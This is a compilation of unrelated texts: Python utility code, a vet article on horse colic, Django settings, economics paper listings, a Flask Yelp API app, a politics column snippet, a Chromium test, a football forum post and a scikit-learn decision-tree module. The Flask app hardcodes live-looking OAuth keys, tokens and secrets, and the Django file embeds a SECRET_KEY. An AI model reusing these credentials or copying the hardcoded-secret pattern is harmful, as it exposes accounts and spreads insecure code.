return split_suffixes(name)[0]
def split_suffixes(name):
"""
>>> split_suffixes("Michael Stephens, Ph.D. J.D, USAF (Ret) III Esq")
('Michael Stephens', 'Ph.D. J.D, USAF (Ret) III Esq')
>>> split_suffixes("Michael Stephens Jr C.P.A ")
('Michael Stephens', 'Jr C.P.A')
>>> split_suffixes("Stephens, Michael Jr.")
('Stephens, Michael', 'Jr.')
>>> split_suffixes("Stephens, Michael ")
('Stephens, Michael', '')
>>> split_suffixes("Stephens, M.")
('Stephens, M.', '')
"""
name = name.rstrip()
match = _suffix_pattern.search(name)
if match:
return (name[0:match.start()].rstrip(),
match.group().lstrip('., \t\r\n'))
return (name, '')
def drop_prefixes(name):
"""
>>> drop_prefixes("Mr. Michael Stephens")
'Michael Stephens'
>>> drop_prefixes("Mr Michael Stephens")
'Michael Stephens'
>>> drop_prefixes(" Doctor Michael Stephens")
'Michael Stephens'
>>> drop_prefixes("The Honorable Michael Stephens")
'Michael Stephens'
>>> drop_prefixes("The Hon Mr. Michael Stephens")
'Michael Stephens'
>>> drop_prefixes(" Michael Stephens")
'Michael Stephens'
>>> drop_prefixes("M. Stephens")
'M. Stephens'
"""
return split_prefixes(name)[1]
def split_prefixes(name):
"""
>>> split_prefixes("Mr. Michael Stephens")
('Mr.', 'Michael Stephens')
>>> split_prefixes("Mr Michael Stephens")
('Mr', 'Michael Stephens')
>>> split_prefixes(" Doctor Michael Stephens")
('Doctor', 'Michael Stephens')
>>> split_prefixes("The Honorable Michael Stephens")
('The Honorable', 'Michael Stephens')
>>> split_prefixes("The Hon Mr. Michael Stephens")
('The Hon Mr.', 'Michael Stephens')
>>> split_prefixes(" Michael Stephens")
('', 'Michael Stephens')
>>> split_prefixes("M. Stephens")
('', 'M. Stephens')
"""
name = name.lstrip()
match = _prefix_pattern.match(name)
if match:
return (match.group(0).strip(),
name[match.end():len(name)].lstrip())
return ('', name)
if __name__ == '__main__':
import doctest
doctest.testmod()
|
Colic is a general term referring to abdominal pain, which could have a variety of causes. It is a common problem that can affect horses of all ages.
Most cases turn out to be gastrointestinal in origin but it can originate in other organs, such as the kidneys, liver or spleen. Pain can also be from the reproductive organs or be the result of problems like bleeding into the abdomen, rupture of urinary bladder or infection.
Most incidences of colic pass quickly, with little intervention, while others become life-threatening and require hospitalisation and surgery. This emphasises the importance of speaking to your equine vet as soon as possible to ensure the best action is taken for your horse.
Assessment is likely to involve rectal examination, ultrasound scan and blood work, as well as palpation of areas of concern. Vets may pass a tube into the stomach or take a sample of fluid from the abdomen to help make in effective diagnosis. This will enable them to quickly decide if your horse needs surgical intervention or is likely to recover without surgery.
Depending on the cause of the pain and how persistent it is, the horse may be treated medically or surgically. In many cases treatment will just involve giving fluids and pain relief.
Cases of spasmodic colic, which may be caused by gas accumulation, feeding issues, parasitical worms, stress or dehydration, resolve with minimal medical intervention. Medical treatment is also the preferred option for an impacted large intestine (constipation).
In cases of displacement, where part of intestine has shifted out of its normal position but blood is still flowing to the intestine, either medical or surgical treatment might be appropriate. Strangulating lesions, where part of the intestine is displaced or twisted so blood flow to the intestine is compromised, would be a surgical emergency.
Colic can be the result of changes to feeding regime, therefore the maintenance of a consistent regime can help prevent it.
A diet that includes adequate fibre-rich foods, such as hay and grass helps prevent colic.
An appropriate worming programme is an essential part of your horse’s management as these internal parasites can cause a wide range of problems, including colic.
|
# Django settings for testapp project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'test.db',
# The following settings are not used with sqlite3:
'USER': '',
'PASSWORD': '',
'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'c8+4^x2s-j3_ucbbh@r2#&)anj&k3#(u(w-)k&7&t)k&3b03#u'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'testapp.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'testapp.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'ios_notifications',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'loggers': {}
}
|
International shocks and domestic prices : how large are strategic complementarities?
Réforme fiscale : quel rôle pour les modèles d'équilibre général calculable?
De Loecker, Jan (contributor); … - 2014 - Rev.
This paper examines how prices, markups and marginal costs respond to trade liberalization. Multi-product firms are used in the study. [BREAD WP No. 418].
How to price the unbundled local loop in the transition from copper to fiber access networks?
|
import os
from flask import Flask, request
import argparse
import json
import pprint
import sys
import urllib
import urllib2
import oauth2
import math
app = Flask(__name__)
CONSUMER_KEY = 'H85zQotPvyaafxY-wFjJOg'
CONSUMER_SECRET = 'LRROlUpL-TLVMA25NztXm6gVnHE'
TOKEN = 'Awp8bAxSd7p_dntg10i9jQEYGqIB1gdo'
TOKEN_SECRET = 'TBE0BGBLhDKprgT-Lt8LvJU5mkQ'
@app.route('/request')
def api_call():
host = 'api.yelp.com'
path = '/v2/search'
limit = request.args.get('limit') # limit in number of restaurants
radius = request.args.get('radius') # radius from center in miles
lat = request.args.get('lat') # center latitude
long_ = request.args.get('long') # center longitude
# test data
# limit = '10'
# radius = '10'
# lat = '37.77493'
# long_ = '-122.419415'
delta_lat = int(radius) / 69.11
delta_long = int(radius) / (69.11 * math.cos(float(lat)))
sw_lat = str(float(lat) - delta_lat)
sw_long = str(float(long_) - delta_long)
ne_lat = str(float(lat) + delta_lat)
ne_long = str(float(long_) + delta_long)
term = 'food'
# if request.args.has_key('cat'):
# cat = request.args.get('cat')
# print request.args.get('cat')
encoded_params = "term={0}&bounds={1},{2}|{3},{4}&limit={5}".format(term, sw_lat, sw_long, ne_lat, ne_long, limit)
# else:
# print 'donkeykong'
# encoded_params = "term={0}&bounds={1},{2}|{3},{4}&limit={5}".format(term, sw_lat, sw_long, ne_lat, ne_long, limit)
url = 'http://{0}{1}?{2}'.format(host, path, encoded_params)
# print url
consumer = oauth2.Consumer(CONSUMER_KEY, CONSUMER_SECRET)
oauth_request = oauth2.Request('GET', url, {})
oauth_request.update(
{
'oauth_nonce': oauth2.generate_nonce(),
'oauth_timestamp': oauth2.generate_timestamp(),
'oauth_token': TOKEN,
'oauth_consumer_key': CONSUMER_KEY
}
)
token = oauth2.Token(TOKEN, TOKEN_SECRET)
oauth_request.sign_request(oauth2.SignatureMethod_HMAC_SHA1(), consumer, token)
signed_url = oauth_request.to_url()
print 'Querying {0} ...'.format(url)
conn = urllib2.urlopen(signed_url, None)
try:
response = json.dumps(json.loads(conn.read()))
finally:
conn.close()
return response
if __name__ == '__main__':
port = int(os.environ.get("PORT", 5000))
app.run(host='0.0.0.0', port=port)
|
But having proposed a tough rule — shares in Goldman Sachs (GS) and other big banks got walloped the day of the announcement — the administration then stood aside as the language got watered down in Congress.
Though this is hardly unusual in itself, it meant Obama punted on what now looks like his last chance to reform the big banks. After all the damage bankers did with their bonus-boosting high-stakes gambling, this doesn’t exactly register as a profile in courage.
The full column is worth a few minutes of your time . . .
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry import browser_finder
from telemetry import options_for_unittests
class BrowserTest(unittest.TestCase):
def testBrowserCreation(self):
options = options_for_unittests.GetCopy()
browser_to_create = browser_finder.FindBrowser(options)
if not browser_to_create:
raise Exception('No browser found, cannot continue test.')
with browser_to_create.Create() as b:
self.assertEquals(1, b.num_tabs)
# Different browsers boot up to different things
assert b.GetNthTabUrl(0)
def testCommandLineOverriding(self):
# This test starts the browser with --enable-benchmarking, which should
# create a chrome.Interval namespace. This tests whether the command line is
# being set.
options = options_for_unittests.GetCopy()
flag1 = '--user-agent=telemetry'
options.extra_browser_args.append(flag1)
browser_to_create = browser_finder.FindBrowser(options)
with browser_to_create.Create() as b:
with b.ConnectToNthTab(0) as t:
t.page.Navigate('http://www.google.com/')
t.WaitForDocumentReadyStateToBeInteractiveOrBetter()
self.assertEquals(t.runtime.Evaluate('navigator.userAgent'),
'telemetry')
def testNewCloseTab(self):
options = options_for_unittests.GetCopy()
browser_to_create = browser_finder.FindBrowser(options)
with browser_to_create.Create() as b:
self.assertEquals(1, b.num_tabs)
existing_tab_url = b.GetNthTabUrl(0)
b.NewTab()
self.assertEquals(2, b.num_tabs)
self.assertEquals(b.GetNthTabUrl(0), existing_tab_url)
self.assertEquals(b.GetNthTabUrl(1), 'about:blank')
b.CloseTab(1)
self.assertEquals(1, b.num_tabs)
self.assertEquals(b.GetNthTabUrl(0), existing_tab_url)
self.assertRaises(AssertionError, b.CloseTab, 0)
|
He’s got to go before it’s to late!!!
Yep, thought it was time I made my feelings known.
I love the fact that Marshall was here, what, four years and still loves the club. Great player, genuinely sad to see him leave when he did.
If we had kept him in 96/97 alongside Mason who was banging them in for fun we'd have won the league that season. Perfect storm, Wrighty establishing, Scowie coming in strong, Dyer coming in, Taricco establishing, Vaughan, Tanner, Petta, Mathie, Milton, Mason and Stockwell was superb that season too.
|
"""
This module gathers tree-based methods, including decision, regression and
randomized trees. Single and multi-output problems are both handled.
"""
# Authors: Gilles Louppe <g.louppe@gmail.com>
# Peter Prettenhofer <peter.prettenhofer@gmail.com>
# Brian Holt <bdholt1@gmail.com>
# Noel Dawe <noel@dawe.me>
# Satrajit Gosh <satrajit.ghosh@gmail.com>
# Joly Arnaud <arnaud.v.joly@gmail.com>
# Fares Hedayati <fares.hedayati@gmail.com>
# Nelson Liu <nelson@nelsonliu.me>
#
# License: BSD 3 clause
from __future__ import division
import numbers
from abc import ABCMeta
from abc import abstractmethod
from math import ceil
import numpy as np
from scipy.sparse import issparse
from ..base import BaseEstimator
from ..base import ClassifierMixin
from ..base import RegressorMixin
from ..externals import six
from ..feature_selection.from_model import _LearntSelectorMixin
from ..utils import check_array
from ..utils import check_random_state
from ..utils import compute_sample_weight
from ..utils.multiclass import check_classification_targets
from ..exceptions import NotFittedError
from ._criterion import Criterion
from ._splitter import Splitter
from ._tree import DepthFirstTreeBuilder
from ._tree import BestFirstTreeBuilder
from ._tree import Tree
from . import _tree, _splitter, _criterion
__all__ = ["DecisionTreeClassifier",
"DecisionTreeRegressor",
"ExtraTreeClassifier",
"ExtraTreeRegressor"]
# =============================================================================
# Types and constants
# =============================================================================
DTYPE = _tree.DTYPE
DOUBLE = _tree.DOUBLE
CRITERIA_CLF = {"gini": _criterion.Gini, "entropy": _criterion.Entropy}
CRITERIA_REG = {"mse": _criterion.MSE, "friedman_mse": _criterion.FriedmanMSE,
"mae": _criterion.MAE}
DENSE_SPLITTERS = {"best": _splitter.BestSplitter,
"random": _splitter.RandomSplitter}
SPARSE_SPLITTERS = {"best": _splitter.BestSparseSplitter,
"random": _splitter.RandomSparseSplitter}
# =============================================================================
# Base decision tree
# =============================================================================
class BaseDecisionTree(six.with_metaclass(ABCMeta, BaseEstimator,
_LearntSelectorMixin)):
"""Base class for decision trees.
Warning: This class should not be used directly.
Use derived classes instead.
"""
@abstractmethod
def __init__(self,
criterion,
splitter,
max_depth,
min_samples_split,
min_samples_leaf,
min_weight_fraction_leaf,
max_features,
max_leaf_nodes,
random_state,
min_impurity_split,
class_weight=None,
presort=False,
increasing=None,
decreasing=None):
self.criterion = criterion
self.splitter = splitter
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.random_state = random_state
self.max_leaf_nodes = max_leaf_nodes
self.min_impurity_split = min_impurity_split
self.class_weight = class_weight
self.presort = presort
self.increasing = increasing
self.decreasing = decreasing
self.n_features_ = None
self.n_outputs_ = None
self.classes_ = None
self.n_classes_ = None
self.tree_ = None
self.max_features_ = None
def fit(self, X, y, sample_weight=None, check_input=True,
X_idx_sorted=None):
"""Build a decision tree from the training set (X, y).
Parameters
----------
X : array-like or sparse matrix, shape = [n_samples, n_features]
The training input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csc_matrix``.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
The target values (class labels in classification, real numbers in
regression). In the regression case, use ``dtype=np.float64`` and
``order='C'`` for maximum efficiency.
sample_weight : array-like, shape = [n_samples] or None
Sample weights. If None, then samples are equally weighted. Splits
that would create child nodes with net zero or negative weight are
ignored while searching for a split in each node. In the case of
classification, splits are also ignored if they would result in any
single class carrying a negative weight in either child node.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
X_idx_sorted : array-like, shape = [n_samples, n_features], optional
The indexes of the sorted training input samples. If many tree
are grown on the same dataset, this allows the ordering to be
cached between trees. If None, the data will be sorted here.
Don't use this parameter unless you know what to do.
Returns
-------
self : object
Returns self.
"""
random_state = check_random_state(self.random_state)
if check_input:
X = check_array(X, dtype=DTYPE, accept_sparse="csc")
y = check_array(y, ensure_2d=False, dtype=None)
if issparse(X):
X.sort_indices()
if X.indices.dtype != np.intc or X.indptr.dtype != np.intc:
raise ValueError("No support for np.int64 index based "
"sparse matrices")
# Determine output settings
n_samples, self.n_features_ = X.shape
is_classification = isinstance(self, ClassifierMixin)
y = np.atleast_1d(y)
expanded_class_weight = None
if y.ndim == 1:
# reshape is necessary to preserve the data contiguity against vs
# [:, np.newaxis] that does not.
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
if is_classification:
check_classification_targets(y)
y = np.copy(y)
self.classes_ = []
self.n_classes_ = []
if self.class_weight is not None:
y_original = np.copy(y)
y_encoded = np.zeros(y.shape, dtype=np.int)
for k in range(self.n_outputs_):
classes_k, y_encoded[:, k] = np.unique(y[:, k],
return_inverse=True)
self.classes_.append(classes_k)
self.n_classes_.append(classes_k.shape[0])
y = y_encoded
if self.class_weight is not None:
expanded_class_weight = compute_sample_weight(
self.class_weight, y_original)
else:
self.classes_ = [None] * self.n_outputs_
self.n_classes_ = [1] * self.n_outputs_
self.n_classes_ = np.array(self.n_classes_, dtype=np.intp)
if getattr(y, "dtype", None) != DOUBLE or not y.flags.contiguous:
y = np.ascontiguousarray(y, dtype=DOUBLE)
# Check parameters
max_depth = ((2 ** 31) - 1 if self.max_depth is None
else self.max_depth)
max_leaf_nodes = (-1 if self.max_leaf_nodes is None
else self.max_leaf_nodes)
if isinstance(self.min_samples_leaf, (numbers.Integral, np.integer)):
min_samples_leaf = self.min_samples_leaf
else: # float
min_samples_leaf = int(ceil(self.min_samples_leaf * n_samples))
if isinstance(self.min_samples_split, (numbers.Integral, np.integer)):
min_samples_split = self.min_samples_split
else: # float
min_samples_split = int(ceil(self.min_samples_split * n_samples))
min_samples_split = max(2, min_samples_split)
min_samples_split = max(min_samples_split, 2 * min_samples_leaf)
if isinstance(self.max_features, six.string_types):
if self.max_features == "auto":
if is_classification:
max_features = max(1, int(np.sqrt(self.n_features_)))
else:
max_features = self.n_features_
elif self.max_features == "sqrt":
max_features = max(1, int(np.sqrt(self.n_features_)))
elif self.max_features == "log2":
max_features = max(1, int(np.log2(self.n_features_)))
else:
raise ValueError(
'Invalid value for max_features. Allowed string '
'values are "auto", "sqrt" or "log2".')
elif self.max_features is None:
max_features = self.n_features_
elif isinstance(self.max_features, (numbers.Integral, np.integer)):
max_features = self.max_features
else: # float
if self.max_features > 0.0:
max_features = max(1,
int(self.max_features * self.n_features_))
else:
max_features = 0
self.max_features_ = max_features
if len(y) != n_samples:
raise ValueError("Number of labels=%d does not match "
"number of samples=%d" % (len(y), n_samples))
if not (0. < self.min_samples_split <= 1. or
2 <= self.min_samples_split):
raise ValueError("min_samples_split must be in at least 2"
" or in (0, 1], got %s" % min_samples_split)
if not (0. < self.min_samples_leaf <= 0.5 or
1 <= self.min_samples_leaf):
raise ValueError("min_samples_leaf must be at least than 1 "
"or in (0, 0.5], got %s" % min_samples_leaf)
if not 0 <= self.min_weight_fraction_leaf <= 0.5:
raise ValueError("min_weight_fraction_leaf must in [0, 0.5]")
if max_depth <= 0:
raise ValueError("max_depth must be greater than zero. ")
if not (0 < max_features <= self.n_features_):
raise ValueError("max_features must be in (0, n_features]")
if not isinstance(max_leaf_nodes, (numbers.Integral, np.integer)):
raise ValueError("max_leaf_nodes must be integral number but was "
"%r" % max_leaf_nodes)
if -1 < max_leaf_nodes < 2:
raise ValueError(("max_leaf_nodes {0} must be either smaller than "
"0 or larger than 1").format(max_leaf_nodes))
if sample_weight is not None:
if (getattr(sample_weight, "dtype", None) != DOUBLE or
not sample_weight.flags.contiguous):
sample_weight = np.ascontiguousarray(
sample_weight, dtype=DOUBLE)
if len(sample_weight.shape) > 1:
raise ValueError("Sample weights array has more "
"than one dimension: %d" %
len(sample_weight.shape))
if len(sample_weight) != n_samples:
raise ValueError("Number of weights=%d does not match "
"number of samples=%d" %
(len(sample_weight), n_samples))
if expanded_class_weight is not None:
if sample_weight is not None:
sample_weight = sample_weight * expanded_class_weight
else:
sample_weight = expanded_class_weight
# Set min_weight_leaf from min_weight_fraction_leaf
if self.min_weight_fraction_leaf != 0. and sample_weight is not None:
min_weight_leaf = (self.min_weight_fraction_leaf *
np.sum(sample_weight))
else:
min_weight_leaf = 0.
if self.min_impurity_split < 0.:
raise ValueError("min_impurity_split must be greater than or equal "
"to 0")
presort = self.presort
# Allow presort to be 'auto', which means True if the dataset is dense,
# otherwise it will be False.
if self.presort == 'auto' and issparse(X):
presort = False
elif self.presort == 'auto':
presort = True
if presort is True and issparse(X):
raise ValueError("Presorting is not supported for sparse "
"matrices.")
# If multiple trees are built on the same dataset, we only want to
# presort once. Splitters now can accept presorted indices if desired,
# but do not handle any presorting themselves. Ensemble algorithms
# which desire presorting must do presorting themselves and pass that
# matrix into each tree.
if X_idx_sorted is None and presort:
X_idx_sorted = np.asfortranarray(np.argsort(X, axis=0),
dtype=np.int32)
if presort and X_idx_sorted.shape != X.shape:
raise ValueError("The shape of X (X.shape = {}) doesn't match "
"the shape of X_idx_sorted (X_idx_sorted"
".shape = {})".format(X.shape,
X_idx_sorted.shape))
# Build tree
criterion = self.criterion
if not isinstance(criterion, Criterion):
if is_classification:
criterion = CRITERIA_CLF[self.criterion](self.n_outputs_,
self.n_classes_)
else:
criterion = CRITERIA_REG[self.criterion](self.n_outputs_,
n_samples)
SPLITTERS = SPARSE_SPLITTERS if issparse(X) else DENSE_SPLITTERS
def _encode_monotonic(increasing, decreasing):
if increasing is None: increasing = []
if decreasing is None: decreasing = []
def is_int_in_range(feature):
return isinstance(feature, int) and 0 <= feature < self.n_features_
def is_valid(features):
return (isinstance(features, list) and
all(is_int_in_range(feature) for feature in features))
if not is_valid(increasing):
raise ValueError("increasing should be a list of ints in the range [0,n_features].")
if not is_valid(decreasing):
raise ValueError("decreasing should be a list of ints in the range [0,n_features].")
if increasing and decreasing:
intersection = set(increasing) & set(decreasing)
if intersection:
raise ValueError("The following features cannot be both increasing and decreasing: " + str(list(intersection)))
monotonic = np.zeros(self.n_features_, dtype=np.int32)
if increasing:
for feature in increasing:
monotonic[feature] = 1
if decreasing:
for feature in decreasing:
monotonic[feature] = -1
return monotonic
monotonic = _encode_monotonic(self.increasing, self.decreasing)
splitter = self.splitter
if not isinstance(self.splitter, Splitter):
splitter = SPLITTERS[self.splitter](criterion,
self.max_features_,
min_samples_leaf,
min_weight_leaf,
random_state,
self.presort,
monotonic)
self.tree_ = Tree(self.n_features_, self.n_classes_, self.n_outputs_)
# Use BestFirst if max_leaf_nodes given; use DepthFirst otherwise
if max_leaf_nodes < 0:
builder = DepthFirstTreeBuilder(splitter, min_samples_split,
min_samples_leaf,
min_weight_leaf,
max_depth, self.min_impurity_split)
else:
builder = BestFirstTreeBuilder(splitter, min_samples_split,
min_samples_leaf,
min_weight_leaf,
max_depth,
max_leaf_nodes, self.min_impurity_split)
builder.build(self.tree_, X, y, sample_weight, X_idx_sorted)
if self.n_outputs_ == 1:
self.n_classes_ = self.n_classes_[0]
self.classes_ = self.classes_[0]
return self
def _validate_X_predict(self, X, check_input):
"""Validate X whenever one tries to predict, apply, predict_proba"""
if self.tree_ is None:
raise NotFittedError("Estimator not fitted, "
"call `fit` before exploiting the model.")
if check_input:
X = check_array(X, dtype=DTYPE, accept_sparse="csr")
if issparse(X) and (X.indices.dtype != np.intc or
X.indptr.dtype != np.intc):
raise ValueError("No support for np.int64 index based "
"sparse matrices")
n_features = X.shape[1]
if self.n_features_ != n_features:
raise ValueError("Number of features of the model must "
"match the input. Model n_features is %s and "
"input n_features is %s "
% (self.n_features_, n_features))
return X
def predict(self, X, check_input=True):
"""Predict class or regression value for X.
For a classification model, the predicted class for each sample in X is
returned. For a regression model, the predicted value based on X is
returned.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
Returns
-------
y : array of shape = [n_samples] or [n_samples, n_outputs]
The predicted classes, or the predict values.
"""
X = self._validate_X_predict(X, check_input)
proba = self.tree_.predict(X)
n_samples = X.shape[0]
# Classification
if isinstance(self, ClassifierMixin):
if self.n_outputs_ == 1:
return self.classes_.take(np.argmax(proba, axis=1), axis=0)
else:
predictions = np.zeros((n_samples, self.n_outputs_))
for k in range(self.n_outputs_):
predictions[:, k] = self.classes_[k].take(
np.argmax(proba[:, k], axis=1),
axis=0)
return predictions
# Regression
else:
if self.n_outputs_ == 1:
return proba[:, 0]
else:
return proba[:, :, 0]
def apply(self, X, check_input=True):
"""
Returns the index of the leaf that each sample is predicted as.
.. versionadded:: 0.17
Parameters
----------
X : array_like or sparse matrix, shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
Returns
-------
X_leaves : array_like, shape = [n_samples,]
For each datapoint x in X, return the index of the leaf x
ends up in. Leaves are numbered within
``[0; self.tree_.node_count)``, possibly with gaps in the
numbering.
"""
X = self._validate_X_predict(X, check_input)
return self.tree_.apply(X)
def decision_path(self, X, check_input=True):
"""Return the decision path in the tree
Parameters
----------
X : array_like or sparse matrix, shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
Returns
-------
indicator : sparse csr array, shape = [n_samples, n_nodes]
Return a node indicator matrix where non zero elements
indicates that the samples goes through the nodes.
"""
X = self._validate_X_predict(X, check_input)
return self.tree_.decision_path(X)
@property
def feature_importances_(self):
"""Return the feature importances.
The importance of a feature is computed as the (normalized) total
reduction of the criterion brought by that feature.
It is also known as the Gini importance.
Returns
-------
feature_importances_ : array, shape = [n_features]
"""
if self.tree_ is None:
raise NotFittedError("Estimator not fitted, call `fit` before"
" `feature_importances_`.")
return self.tree_.compute_feature_importances()
# =============================================================================
# Public estimators
# =============================================================================
class DecisionTreeClassifier(BaseDecisionTree, ClassifierMixin):
"""A decision tree classifier.
Read more in the :ref:`User Guide <tree>`.
Parameters
----------
criterion : string, optional (default="gini")
The function to measure the quality of a split. Supported criteria are
"gini" for the Gini impurity and "entropy" for the information gain.
splitter : string, optional (default="best")
The strategy used to choose the split at each node. Supported
strategies are "best" to choose the best split and "random" to choose
the best random split.
max_features : int, float, string or None, optional (default=None)
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=sqrt(n_features)`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_depth : int or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int, float, optional (default=2)
The minimum number of samples required to split an internal node:
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a percentage and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
min_samples_leaf : int, float, optional (default=1)
The minimum number of samples required to be at a leaf node:
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a percentage and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
max_leaf_nodes : int or None, optional (default=None)
Grow a tree with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
class_weight : dict, list of dicts, "balanced" or None, optional (default=None)
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one. For
multi-output problems, a list of dicts can be provided in the same
order as the columns of y.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
For multi-output, the weights of each column of y will be multiplied.
Note that these weights will be multiplied with sample_weight (passed
through the fit method) if sample_weight is specified.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
min_impurity_split : float, optional (default=1e-7)
Threshold for early stopping in tree growth. A node will split
if its impurity is above the threshold, otherwise it is a leaf.
.. versionadded:: 0.18
presort : bool, optional (default=False)
Whether to presort the data to speed up the finding of best splits in
fitting. For the default settings of a decision tree on large
datasets, setting this to true may slow down the training process.
When using either a smaller dataset or a restricted depth, this may
speed up the training.
increasing : list of ints, optional (default=None)
Indices of features to have a monotonically increasing effect.
decreasing : list of ints, optional (default=None)
Indices of features to have a monotonically decreasing effect.
Attributes
----------
classes_ : array of shape = [n_classes] or a list of such arrays
The classes labels (single output problem),
or a list of arrays of class labels (multi-output problem).
feature_importances_ : array of shape = [n_features]
The feature importances. The higher, the more important the
feature. The importance of a feature is computed as the (normalized)
total reduction of the criterion brought by that feature. It is also
known as the Gini importance [4]_.
max_features_ : int,
The inferred value of max_features.
n_classes_ : int or list
The number of classes (for single output problems),
or a list containing the number of classes for each
output (for multi-output problems).
n_features_ : int
The number of features when ``fit`` is performed.
n_outputs_ : int
The number of outputs when ``fit`` is performed.
tree_ : Tree object
The underlying Tree object.
See also
--------
DecisionTreeRegressor
References
----------
.. [1] https://en.wikipedia.org/wiki/Decision_tree_learning
.. [2] L. Breiman, J. Friedman, R. Olshen, and C. Stone, "Classification
and Regression Trees", Wadsworth, Belmont, CA, 1984.
